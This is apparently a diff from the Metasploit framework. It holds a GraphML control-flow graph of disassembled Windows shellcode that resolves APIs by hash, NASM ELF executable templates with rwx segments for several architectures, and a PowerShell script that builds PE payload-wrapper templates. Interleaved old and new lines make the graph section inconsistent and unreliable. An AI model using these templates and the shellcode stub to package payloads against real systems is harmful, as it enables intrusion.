<data key="type">block</data>
<node id="block.0x1051:instruction.0x1051">
<data key="address">0x1051</data>
<node id="block.0x1055:instruction.0x1055">
<data key="address">0x1055</data>
<data key="type">instruction</data>
<data key="instruction.hex">31c0</data>
<data key="instruction.source">xor eax, eax</data>
</node>
<node id="block.0x1051:instruction.0x1053">
<data key="address">0x1053</data>
<node id="block.0x1055:instruction.0x1057">
<data key="address">0x1057</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
</node>
<node id="block.0x1051:instruction.0x1054">
<data key="address">0x1054</data>
<node id="block.0x1055:instruction.0x1058">
<data key="address">0x1058</data>
<data key="type">instruction</data>
<data key="instruction.hex">c1cf0d</data>
<data key="instruction.source">ror edi, 0xd</data>
</node>
<node id="block.0x1051:instruction.0x1057">
<data key="address">0x1057</data>
<node id="block.0x1055:instruction.0x105b">
<data key="address">0x105b</data>
<data key="type">instruction</data>
<data key="instruction.hex">01c7</data>
<data key="instruction.source">add edi, eax</data>
</node>
<node id="block.0x1051:instruction.0x1059">
<data key="address">0x1059</data>
<node id="block.0x1055:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">38e0</data>
<data key="instruction.source">cmp al, ah</data>
</node>
<node id="block.0x1051:instruction.0x105b">
<data key="address">0x105b</data>
<node id="block.0x1055:instruction.0x105f">
<data key="address">0x105f</data>
<data key="type">instruction</data>
<data key="instruction.hex">75f4</data>
<data key="instruction.source">jne 0x1051</data>
<data key="instruction.source">jne 0x1055</data>
</node>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
<edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1057"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1058"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x1058" target="block.0x1055:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x105b" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
</graph>
</node>
<node id="block.0x105d">
<data key="address">0x105d</data>
<node id="block.0x1061">
<data key="address">0x1061</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x105d</data>
<data key="address">0x1061</data>
<data key="type">block</data>
<node id="block.0x105d:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">037df8</data>
<data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
</node>
<node id="block.0x105d:instruction.0x1060">
<data key="address">0x1060</data>
<node id="block.0x1061:instruction.0x1061">
<data key="address">0x1061</data>
<data key="type">instruction</data>
<data key="instruction.hex">3b7d24</data>
<data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
</node>
<node id="block.0x105d:instruction.0x1063">
<data key="address">0x1063</data>
<node id="block.0x1061:instruction.0x1064">
<data key="address">0x1064</data>
<data key="type">instruction</data>
<data key="instruction.hex">75e0</data>
<data key="instruction.source">jne 0x1045</data>
<data key="instruction.hex">75e2</data>
<data key="instruction.source">jne 0x1048</data>
</node>
<edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
<edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
<edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
</graph>
</node>
<node id="block.0x1065">
<data key="address">0x1065</data>
<node id="block.0x1066">
<data key="address">0x1066</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1065</data>
<data key="address">0x1066</data>
<data key="type">block</data>
<node id="block.0x1065:instruction.0x1065">
<data key="address">0x1065</data>
<node id="block.0x1066:instruction.0x1066">
<data key="address">0x1066</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
<node id="block.0x1065:instruction.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1066:instruction.0x1067">
<data key="address">0x1067</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5824</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
</node>
<node id="block.0x1065:instruction.0x1069">
<data key="address">0x1069</data>
<node id="block.0x1066:instruction.0x106a">
<data key="address">0x106a</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<node id="block.0x1065:instruction.0x106b">
<data key="address">0x106b</data>
<node id="block.0x1066:instruction.0x106c">
<data key="address">0x106c</data>
<data key="type">instruction</data>
<data key="instruction.hex">668b0c4b</data>
<data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
</node>
<node id="block.0x1065:instruction.0x106f">
<data key="address">0x106f</data>
<node id="block.0x1066:instruction.0x1070">
<data key="address">0x1070</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b581c</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
</node>
<node id="block.0x1065:instruction.0x1072">
<data key="address">0x1072</data>
<node id="block.0x1066:instruction.0x1073">
<data key="address">0x1073</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<node id="block.0x1065:instruction.0x1074">
<data key="address">0x1074</data>
<node id="block.0x1066:instruction.0x1075">
<data key="address">0x1075</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b048b</data>
<data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
</node>
<node id="block.0x1065:instruction.0x1077">
<data key="address">0x1077</data>
<node id="block.0x1066:instruction.0x1078">
<data key="address">0x1078</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x1065:instruction.0x1079">
<data key="address">0x1079</data>
<node id="block.0x1066:instruction.0x107a">
<data key="address">0x107a</data>
<data key="type">instruction</data>
<data key="instruction.hex">89442424</data>
<data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
</node>
<node id="block.0x1065:instruction.0x107d">
<data key="address">0x107d</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1065:instruction.0x107e">
<node id="block.0x1066:instruction.0x107e">
<data key="address">0x107e</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1065:instruction.0x107f">
<node id="block.0x1066:instruction.0x107f">
<data key="address">0x107f</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1066:instruction.0x1080">
<data key="address">0x1080</data>
<data key="type">instruction</data>
<data key="instruction.hex">61</data>
<data key="instruction.source">popal</data>
</node>
<node id="block.0x1065:instruction.0x1080">
<data key="address">0x1080</data>
<node id="block.0x1066:instruction.0x1081">
<data key="address">0x1081</data>
<data key="type">instruction</data>
<data key="instruction.hex">59</data>
<data key="instruction.source">pop ecx</data>
</node>
<node id="block.0x1065:instruction.0x1081">
<data key="address">0x1081</data>
<node id="block.0x1066:instruction.0x1082">
<data key="address">0x1082</data>
<data key="type">instruction</data>
<data key="instruction.hex">5a</data>
<data key="instruction.source">pop edx</data>
</node>
<node id="block.0x1065:instruction.0x1082">
<data key="address">0x1082</data>
<node id="block.0x1066:instruction.0x1083">
<data key="address">0x1083</data>
<data key="type">instruction</data>
<data key="instruction.hex">51</data>
<data key="instruction.source">push ecx</data>
</node>
<node id="block.0x1065:instruction.0x1083">
<data key="address">0x1083</data>
<node id="block.0x1066:instruction.0x1084">
<data key="address">0x1084</data>
<data key="type">instruction</data>
<data key="instruction.hex">ffe0</data>
<data key="instruction.source">jmp eax</data>
</node>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
<edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
<edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
<edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
</graph>
</node>
<node id="block.0x1085">
<data key="address">0x1085</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1085</data>
<data key="type">block</data>
<node id="block.0x1085:instruction.0x1085">
<data key="address">0x1085</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
<edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
<edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
<edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
</graph>
</node>
<node id="block.0x1086">
@@ -566,44 +545,58 @@
<node id="block.0x1086:instruction.0x1086">
<data key="address">0x1086</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
</graph>
</node>
<node id="block.0x1087">
<data key="address">0x1087</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1087</data>
<data key="type">block</data>
<node id="block.0x1087:instruction.0x1087">
<data key="address">0x1087</data>
<data key="type">instruction</data>
<data key="instruction.hex">5f</data>
<data key="instruction.source">pop edi</data>
</node>
<node id="block.0x1086:instruction.0x1087">
<data key="address">0x1087</data>
<node id="block.0x1087:instruction.0x1088">
<data key="address">0x1088</data>
<data key="type">instruction</data>
<data key="instruction.hex">5a</data>
<data key="instruction.source">pop edx</data>
</node>
<node id="block.0x1086:instruction.0x1088">
<data key="address">0x1088</data>
<node id="block.0x1087:instruction.0x1089">
<data key="address">0x1089</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b12</data>
<data key="instruction.source">mov edx, dword ptr [edx]</data>
</node>
<node id="block.0x1086:instruction.0x108a">
<data key="address">0x108a</data>
<node id="block.0x1087:instruction.0x108b">
<data key="address">0x108b</data>
<data key="type">instruction</data>
<data key="instruction.hex">eb83</data>
<data key="instruction.hex">eb82</data>
<data key="instruction.source">jmp 0x100f</data>
</node>
<edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
<edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
<edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x1088"/>
<edge source="block.0x1087:instruction.0x1088" target="block.0x1087:instruction.0x1089"/>
<edge source="block.0x1087:instruction.0x1089" target="block.0x1087:instruction.0x108b"/>
</graph>
</node>
<edge source="block.0x1000" target="block.0x100f"/>
<edge source="block.0x100f" target="block.0x1018"/>
<edge source="block.0x1018" target="block.0x101f"/>
<edge source="block.0x101f" target="block.0x1021"/>
<edge source="block.0x1021" target="block.0x1029"/>
<edge source="block.0x1029" target="block.0x103a"/>
<edge source="block.0x103a" target="block.0x1045"/>
<edge source="block.0x1045" target="block.0x1049"/>
<edge source="block.0x1049" target="block.0x1051"/>
<edge source="block.0x1051" target="block.0x105d"/>
<edge source="block.0x105d" target="block.0x1065"/>
<edge source="block.0x1065" target="block.0x1085"/>
<edge source="block.0x1085" target="block.0x1086"/>
<edge source="block.0x100f" target="block.0x101b"/>
<edge source="block.0x101b" target="block.0x1022"/>
<edge source="block.0x1022" target="block.0x1024"/>
<edge source="block.0x1024" target="block.0x102c"/>
<edge source="block.0x102c" target="block.0x103d"/>
<edge source="block.0x103d" target="block.0x1048"/>
<edge source="block.0x1048" target="block.0x104c"/>
<edge source="block.0x104c" target="block.0x1055"/>
<edge source="block.0x1055" target="block.0x1061"/>
<edge source="block.0x1061" target="block.0x1066"/>
<edge source="block.0x1066" target="block.0x1086"/>
<edge source="block.0x1086" target="block.0x1087"/>
</graph>
</graphml>
@@ -88,5 +88,7 @@ strtab:
db 0
db 0
strtabsz equ $ - strtab
align 4
global _start
_start:
@@ -94,5 +94,6 @@ strtab:
db 0
strtabsz equ $ - strtab
align 4
global _start
_start:
+8
View File
@@ -0,0 +1,8 @@
#!/bin/sh
dst_folder="../../../"
for file in $(find ./ -name "*.s")
do
arch=`echo $file | cut -d "_" -f2`;
nasm -f bin $file -o $dst_folder"template_"$arch"_linux.bin"
done
@@ -1,7 +1,6 @@
; build with:
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
BITS 64
org 0x400000
ehdr: ; Elf32_Ehdr
@@ -0,0 +1,37 @@
; build with:
; nasm elf_armbe_template.s -f bin -o template_armbe_linux.bin
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x2800 ; e_machine = ARM
dd 0x01000000 ; e_version
dd 0x54800000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00800000 ; p_vaddr
dd 0x00800000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00100000 ; p_align
phdrsize equ $ - phdr
_start:
@@ -0,0 +1,55 @@
; build with:
; nasm elf_mips64_template.s -f bin -o template_mips64_linux.bin
%define WORD_BE(value) (((value & 0xFF) << 8) | ((value >> 8) & 0xFF))
%define DWORD_BE(dword) (((dword & 0xFF) << 24) | \
((dword & 0xFF00) << 8) | \
((dword >> 8) & 0xFF00) | \
((dword >> 24) & 0xFF))
%define QWORD_BE(qword) ( \
((qword & 0x00000000000000FF) << 56) | \
((qword & 0x000000000000FF00) << 40) | \
((qword & 0x0000000000FF0000) << 24) | \
((qword & 0x00000000FF000000) << 8) | \
((qword >> 8) & 0x000000FF00000000) | \
((qword >> 24) & 0x0000FF0000000000) | \
((qword >> 40) & 0x00FF000000000000) | \
((qword >> 56) & 0xFF00000000000000) )
BITS 64
org 0x400000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw WORD_BE(2) ; e_type = ET_EXEC for an executable
dw WORD_BE(0x08) ; e_machine = MIPS
dd 0 ; e_version
dq QWORD_BE(0x400078) ; e_entry
dq QWORD_BE(0x40) ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw WORD_BE(0x40) ; e_ehsize
dw WORD_BE(0x38) ; e_phentsize
dw WORD_BE(0x1) ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd DWORD_BE(1) ; p_type = PT_LOAD
dd DWORD_BE(7) ; p_flags = rwx
dq 0 ; p_offset
dq QWORD_BE(0x400000) ; p_vaddr
dq QWORD_BE(0x400000) ; p_paddr
dq QWORD_BE(0xA00000) ; p_filesz
dq QWORD_BE(0xA00000) ; p_memsz
dq QWORD_BE(0x1000) ; p_align
phdrsize equ $ - phdr
global _start
_start:
+40
View File
@@ -0,0 +1,40 @@
; build with:
; nasm elf_ppc64le_template.s -f bin -o template_ppc64le_linux.bin
BITS 64
org 0x400000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0x15 ; e_machine = PPC64
dd 0 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
dq _start+0x8
@@ -0,0 +1,37 @@
; build with:
; nasm elf_ppc_template.s -f bin -o template_ppc_linux.bin
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1400 ; e_machine = PPC
dd 0x01000000 ; e_version
dd 0x54100000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00100000 ; p_vaddr
dd 0x00100000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00000100 ; p_align
phdrsize equ $ - phdr
_start:
@@ -0,0 +1,37 @@
; build with:
; nasm elf_ppce500v2_template.s -f bin -o template_ppce500v2_linux.bin
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1400 ; e_machine = PPC
dd 0x01000000 ; e_version
dd 0x54100000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00100000 ; p_vaddr
dd 0x00100000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00000100 ; p_align
phdrsize equ $ - phdr
_start:
+34
View File
@@ -0,0 +1,34 @@
; build with:
; nasm elf_zarch_template.s -f bin -o template_zarch_linux.bin
BITS 64
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1600 ; e_machine = ZARCH
dd 0x01000000 ; e_version
dq 0x7810000000000000 ; e_entry
dq 0x4000000000000000 ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw 0x4000 ; e_ehsize
dw 0x3800 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = PT_LOAD
dd 0x07000000 ; p_flags = rwx
dq 0 ; p_offset
dq 0x0010000000000000 ; p_vaddr
dq 0x0010000000000000 ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x0000100000000000 ; p_align
_start:
+15 -6
View File
@@ -2,9 +2,18 @@
This directory contains the source code for the PE executable templates.
## Building
Use the provided `build_all.bat` file, and run it from within the Visual Studio
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
variable be defined (which it should be by default). The build script will
create both the x86 and x64 templates before moving them into the correct
folder. The current working directory when the build is run must be the source
code directory (`pe`).
Use the provided `build_all.ps1` script from within the Visual Studio developer
console. The script requires that the `%VCINSTALLDIR%` environment variable be
defined (which it should be by default). By default it builds all templates for
both x86 and x64, then moves the outputs into the correct folder.
```powershell
# build everything
.\build_all.ps1
# build only x86
.\build_all.ps1 -Architectures x86
# build only EXE templates
.\build_all.ps1 -Templates exe,exe_service
```
-17
View File
@@ -1,17 +0,0 @@
@echo off
echo Compiling DLLs
for /D %%d in (dll*) do (
pushd "%%d"
call build.bat
popd
)
echo Compiling EXEs
for /D %%e in (exe*) do (
pushd "%%e"
call build.bat
popd
)
+230
View File
@@ -0,0 +1,230 @@
<#
.SYNOPSIS
Build all PE executable and DLL templates for Metasploit.
.DESCRIPTION
Compiles x86 and x64 variants of the EXE, service EXE, DLL, GDI+ DLL, and
mixed-mode DLL templates using the MSVC toolchain. After linking, the EXE
templates are patched to lower the minimum subsystem version so they can run
on legacy Windows (NT 4.0+ for x86, Server 2003+ for x64). Modern MSVC
linkers enforce a floor of 5.01/5.02 which is too high for those targets.
.PARAMETER Architectures
Which architectures to build. Defaults to both x86 and x64.
.PARAMETER Templates
Which templates to build. Defaults to all of them.
.EXAMPLE
.\build_all.ps1
.\build_all.ps1 -Architectures x86
.\build_all.ps1 -Templates exe,exe_service
#>
param(
[ValidateSet('x86', 'x64')]
[string[]]$Architectures = @('x86', 'x64'),
[ValidateSet('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')]
[string[]]$Templates = @('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')
)
$ErrorActionPreference = 'Stop'
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
$OutputDir = Resolve-Path (Join-Path $ScriptDir '..\..')
# Each entry defines only what varies per template. The build function handles
# the common logic: calling cl, optional 256KiB variant, PE version patching.
#
# Dir - subdirectory containing the source
# OutputFmt - output filename format string, {0} is replaced with the architecture
# Source - source file passed to cl
# ClFlags - flags passed to cl (before /link)
# LinkLibs - libraries passed to the linker (after /link)
# LinkRes - optional .res file to link
# EntryPoint - /entry value
# NoDefaultLib - if set, pass /NODEFAULTLIB to the linker
# RcArgs - optional resource compiler arguments (run before cl)
# PatchVersion - if set, patch the PE subsystem version after linking
#
# DLL templates automatically get a 256KiB payload variant built alongside the
# standard size. This is determined by the output extension, not a per-template flag.
$BuildDefs = [ordered]@{
exe = @{
Dir = 'exe'
OutputFmt = 'template_{0}_windows.exe'
Source = 'template.c'
ClFlags = @('/GS-')
LinkLibs = @('kernel32.lib')
EntryPoint = 'main'
NoDefaultLib = $true
PatchVersion = $true
}
exe_service = @{
Dir = 'exe_service'
OutputFmt = 'template_{0}_windows_svc.exe'
Source = 'template.c'
ClFlags = @('/GS-', '/DBUILDMODE=2')
LinkLibs = @('advapi32.lib', 'kernel32.lib')
EntryPoint = 'main'
NoDefaultLib = $true
PatchVersion = $true
}
dll = @{
Dir = 'dll'
OutputFmt = 'template_{0}_windows.dll'
Source = 'template.c'
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2')
LinkLibs = @('kernel32.lib')
LinkRes = 'template.res'
EntryPoint = 'DllMain'
RcArgs = @('/v', 'template.rc')
}
dll_gdiplus = @{
Dir = 'dll_gdiplus'
OutputFmt = 'template_{0}_windows_dccw_gdiplus.dll'
Source = '../dll/template.c'
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2', '/I', '.', '/FI', 'exports.h')
LinkLibs = @('kernel32.lib')
LinkRes = 'template.res'
EntryPoint = 'DllMain'
RcArgs = @('/v', '/fo', 'template.res', '../dll/template.rc')
}
dll_mixed_mode = @{
Dir = 'dll_mixed_mode'
OutputFmt = 'template_{0}_windows_mixed_mode.dll'
Source = 'template.cpp'
ClFlags = @('/CLR', '/LD', '/GS-', '/I', '..\dll', '/DBUILDMODE=2')
LinkLibs = @('mscoree.lib', 'kernel32.lib')
EntryPoint = 'DllMain'
}
}
if (-not $env:VCINSTALLDIR) {
Write-Error 'VCINSTALLDIR is not set. Run this script from a Visual Studio Developer Command Prompt.'
exit 1
}
function Invoke-VCVars {
param([string]$Arch)
# vcvarsall.bat no-ops if VSCMD_VER is already set, so clear its state
# flags before re-running. Otherwise the second arch silently inherits
